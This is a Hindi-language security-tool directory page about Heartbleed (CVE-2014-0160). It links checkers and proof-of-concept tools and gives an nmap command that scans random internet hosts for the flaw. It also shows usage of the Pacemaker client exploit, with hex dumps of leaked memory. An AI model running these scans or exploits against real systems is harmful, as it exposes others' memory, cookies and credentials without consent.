Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-0160 — Heartbleed वेरिएंट | Kitploit
उपकरण/GitHubGitHub/0x90/cve-2014-0160
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षाफज़िंगनेटवर्क सुरक्षाक्रिप्टोग्राफीपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0x90/cve-2014-0160

CVE-2014-0160

Heartbleed वेरिएंट

रिपॉजिटरी देखें
81312 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-0160

लिंक

https://github.com/DisK0nn3cT/MaltegoHeartbleed

https://github.com/a0726h77/heartbleed-test

https://github.com/musalbas/heartbleed-masstest

https://github.com/decal/ssltest-stls

https://github.com/isgroup-srl/openmagic

https://github.com/offensive-python/HeartLeak

Nmap

nmap -sV -PS443 --open --script=ssl-heartbleed -iR 0

Cisco और DD-WRT

http://security.stackexchange.com/questions/55085/heartbleed-and-routers-asas-other

PoC

CVE-2014-0160 के लिए एक जाँचकर्ता (साइट और उपकरण): https://github.com/FiloSottile/Heartbleed ssltest.py: CVE-2014-0160 का त्वरित और गन्दा प्रदर्शन, Jared Stafford द्वारा http://pastebin.com/WmxzjkXJ

SSL Server Test https://www.ssllabs.com/ssltest/index.html

Metasploit Module: https://github.com/rapid7/metasploit-framework/pull/3206/files

Nmap NSE script: पता लगाता है कि सर्वर OpenSSL Heartbleed के प्रति संवेदनशील है या नहीं: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse

Nmap NSE script: ssl_heartbleed के लिए त्वरित और गन्दा OpenVAS nasl रैपर, ssl_cert_expiry.nas पर आधारित: https://gist.github.com/RealRancor/10140249

Heartbleeder: आपके सर्वरों का OpenSSL के लिए परीक्षण करता है: https://github.com/titanous/heartbleeder?files=1

Heartbleed हमला POC और बड़े पैमाने पर स्कैनर: https://bitbucket.org/fb1h2s/cve-2014-0160

Heartbleed हनीपॉट स्क्रिप्ट: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Pacamaker

https://github.com/Lekensteyn/pacemaker

Pacemaker

Pacemaker

OpenSSL क्लाइंट्स का दुरुपयोग करने का प्रयास करता है जो Heartbleed (CVE-2014-0160) के प्रति संवेदनशील हैं। Python 2 और 3 के साथ संगत।

क्या मैं संवेदनशील हूँ?

सर्वर चलाएँ:

root@kitploit:~
python pacemaker.py

अपने क्लाइंट में, https://localhost:4433/ खोलें (यदि आवश्यक हो तो होस्टनेम बदलें)। उदाहरण के लिए:

root@kitploit:~
curl https://localhost:4433/

क्लाइंट हमेशा कनेक्ट करने में विफल रहेगा:

root@kitploit:~
curl: (35) Unknown SSL protocol error in connection to localhost:4433

यदि आप संवेदनशील नहीं हैं, तो सर्वर कुछ इस प्रकार आउटपुट देगा:

root@kitploit:~
Connection from: 127.0.0.1:40736
Possibly not vulnerable

यदि आप संवेदनशील हैं, तो आप कुछ इस प्रकार देखेंगे:

root@kitploit:~
Connection from: 127.0.0.1:40738
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 00 00 00 00 00 00 00 00 00 00  ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
8000: 00 00 00 00 00 00 00 00 00 00 18 03 03 40 00 00  .............@..
...
e440: 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7 95 8c 33 42  ....`_....~...3B
e450: 3f d5 00 c0 30 00 00 05 00 0f 00 01 01 00 00 00  ?...0...........
fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ...............

बाद में NUL बाइट्स से भरी पंक्तियाँ एक * के साथ मोड़ दी जाती हैं (xxd उपकरण की तरह)।

एक उदाहरण जहाँ wget -O /dev/null https://google.com https://localhost:4433 का उपयोग करके अधिक "दिलचस्प" मेमोरी लीक होती है:

root@kitploit:~
Connection from: 127.0.0.1:41914
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 65 0d 0a 43 6f 6e 74 65 6e 74  ......e..Content
0040: 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c  -Type: text/html
0050: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d  ; charset=UTF-8.
...
0b50: 01 05 05 07 02 01 16 2d 68 74 74 70 73 3a 2f 2f  .......-https://
0b60: 77 77 77 2e 67 65 6f 74 72 75 73 74 2e 63 6f 6d  www.geotrust.com
0b70: 2f 72 65 73 6f 75 72 63 65 73 2f 72 65 70 6f 73  /resources/repos
0b80: 69 74 6f 72 79 30 0d 06 09 2a 86 48 86 f7 0d 01  itory0...*.H....
0b90: 01 05 05 00 03 81 81 00 76 e1 12 6e 4e 4b 16 12  ........v..nNK..
0ba0: 86 30 06 b2 81 08 cf f0 08 c7 c7 71 7e 66 ee c2  .0.........q~f..
0bb0: ed d4 3b 1f ff f0 f0 c8 4e d6 43 38 b0 b9 30 7d  ..;.....N.C8..0}
0bc0: 18 d0 55 83 a2 6a cb 36 11 9c e8 48 66 a3 6d 7f  ..U..j.6...Hf.m.
0bd0: b8 13 d4 47 fe 8b 5a 5c 73 fc ae d9 1b 32 19 38  ...G..Z\s....2.8
0be0: ab 97 34 14 aa 96 d2 eb a3 1c 14 08 49 b6 bb e5  ..4.........I...
0bf0: 91 ef 83 36 eb 1d 56 6f ca da bc 73 63 90 e4 7f  ...6..Vo...sc...
0c00: 7b 3e 22 cb 3d 07 ed 5f 38 74 9c e3 03 50 4e a1  {>".=.._8t...PN.
0c10: af 98 ee 61 f2 84 3f 12 00 00 00 00 00 00 00 00  ...a..?.........
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
...
ffd0: 00 00 00 00 5c d3 3c 02 00 00 00 00 49 53 4f 36  ....\.<.....ISO6
ffe0: 34 36 2d 53 45 2f 2f 00 53 45 4e 5f 38 35 30 32  46-SE//.SEN_8502
fff0: 30 30 5f 42 2f 2f 00 00 00 00 00 00 00 00 00     00_B//.........

उन्नत उपयोग

अधिक विकल्पों के लिए ./pacemaker.py -h चलाएँ। सबसे महत्वपूर्ण विकल्प संभवतः -t (--timeout) और -x (--count) हैं। डिफ़ॉल्ट टाइमआउट 3 सेकंड है जो अधिकांश क्लाइंट्स को प्रतिक्रिया देने के लिए पर्याप्त होना चाहिए (जब तक कि कोई सैटेलाइट लिंक या कुछ न हो)।

प्रति हार्टबीट अधिक धैर्य रखने (5 सेकंड) और चार हार्टबीट प्रतिक्रियाएँ प्राप्त करने का उदाहरण:

root@kitploit:~
./pacemaker.py -t 5 -x 4

सिद्धांत रूप में, हार्टबीट अब बीस सेकंड ले सकते हैं, लेकिन व्यवहार में आपको बहुत तेज़ प्रतिक्रियाएँ मिलेंगी।

परीक्षित क्लाइंट्स

निम्नलिखित क्लाइंट्स का OpenSSL 1.0.1f के विरुद्ध Arch Linux पर परीक्षण किया गया और हैंडशेक से पहले मेमोरी लीक हुई:

  • MariaDB 5.5.36
  • wget 1.15 (पिछले कनेक्शनों और अपनी स्थिति की मेमोरी लीक करता है)
  • curl 7.36.0 (https, --ftp-ssl के साथ FTP/IMAP/POP3/SMTP)
  • git 1.9.1 (क्लोन/पुश का परीक्षण, अधिक लीक नहीं करता)
  • nginx 1.4.7 (प्रॉक्सी मोड में, पिछले अनुरोधों की मेमोरी लीक करता है)
  • links 2.8 (पिछली विज़िट की सामग्री लीक करता है!)
  • KDE 4.12.4 (kioclient, Dolphin, kde4-ftps-kio के साथ https और ftps का परीक्षण)
  • Exim 4.82 (बाहर जाने वाला SMTP)

links एक बेहतरीन उदाहरण है जो क्लाइंट्स पर इस बग के प्रभाव को दर्शाता है। यह एक टेक्स्ट-आधारित ब्राउज़र है जो हेडर (कुकीज़, प्राधिकरण टोकन) और पृष्ठ सामग्री सहित विवरण लीक करता है।

ssltest.py

इस रिपॉजिटरी में सर्वरों को लक्षित करने वाला एक कार्यशील संस्करण भी शामिल है। ssltest.py Jared Stafford ([email protected]) द्वारा बनाया गया था, सारा श्रेय उन्हीं को जाता है! इसे http://s3.jspenguin.org/ssltest.py से लिया गया था।

इस समय, स्क्रिप्ट केवल Python 2 के साथ संगत है।

लिंक

https://www.nccgroup.com/en/blog/2014/04/heartbleed-openssl-vulnerability/ https://www.mattslifebytes.com/?p=533 https://gist.github.com/takeshixx/10107280 https://github.com/FiloSottile/Heartbleed http://www.reddit.com/r/netsec/comments/22huui/python_heartbleed_cve20140160_proof_of_concept/

http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html

टूल डाउनलोड करें